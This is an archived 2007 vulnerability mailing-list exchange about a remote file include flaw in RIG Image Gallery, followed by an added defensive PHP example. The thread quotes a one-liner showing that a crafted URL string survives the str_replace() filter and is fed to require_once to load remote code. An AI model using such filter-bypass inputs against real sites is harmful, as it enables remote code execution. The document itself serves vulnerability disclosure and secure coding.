[VIM] WTF: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability
George A. Theall
theall at tenablesecurity.com
Tue Jul 31 13:26:39 UTC 2007
On 07/31/07 11:09, ascii wrote:
> George A. Theall wrote:
>> But regardless, the str_replace() later on in rig_check_src_file()
>> would certainly void the possibility of a remote file include attack.
>
> I'm not saying that the product is vulnerable but that this statement
> is completely flawed,
...
> php -r '$name="http:/:///www.tin.it/"; $name = str_replace("..", ".",
> str_replace("://", "", $name)); echo $name."\n"; require_once($name);'
> http://www.tin.it/
You're right, of course. But along with the register_globals check it
does prevent the example exploit from working.
George
--
theall at tenablesecurity.com
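
The point ascii makes above, as an added example (not code from RIG or from either poster): a filter that deletes bad substrings once can assemble the very pattern it removes, so the input should be rejected and the resolved path confined instead. `strip_filter()` reproduces the two `str_replace()` calls quoted in the thread; `resolve_local()`, the temporary directory and `album.php` are hypothetical names constructed for the demonstration.

```php
<?php
// The filter as quoted in the thread: one pass per pattern, result never re-checked.
function strip_filter(string $name): string
{
    return str_replace("..", ".", str_replace("://", "", $name));
}

// Hypothetical replacement: refuse suspicious input instead of rewriting it,
// then require the canonical path to stay inside a fixed base directory.
function resolve_local(string $baseDir, string $name): ?string
{
    // Scheme separators, traversal sequences and NUL bytes are rejected outright.
    foreach ([':', '..', "\0"] as $bad) {
        if (strpos($name, $bad) !== false) {
            return null;
        }
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null; // base directory or target file does not exist
    }
    // The canonical path must begin with "<base>/".
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Input string taken from the thread; everything below is constructed.
$input = "http:/:///www.tin.it/";
$once  = strip_filter($input);
echo "after filter: ", $once, "\n";
echo "scheme still present: ", (strpos($once, "://") !== false ? "yes" : "no"), "\n";

// Throwaway directory holding one legitimate include target.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "rig_demo_" . getmypid();
mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . "album.php", "<?php // constructed sample\n");

foreach ([$input, $once, "../album.php", "album.php"] as $candidate) {
    $result = resolve_local($base, $candidate);
    echo str_pad($candidate, 24), " => ", ($result === null ? "rejected" : "accepted"), "\n";
}

unlink($base . DIRECTORY_SEPARATOR . "album.php");
rmdir($base);
```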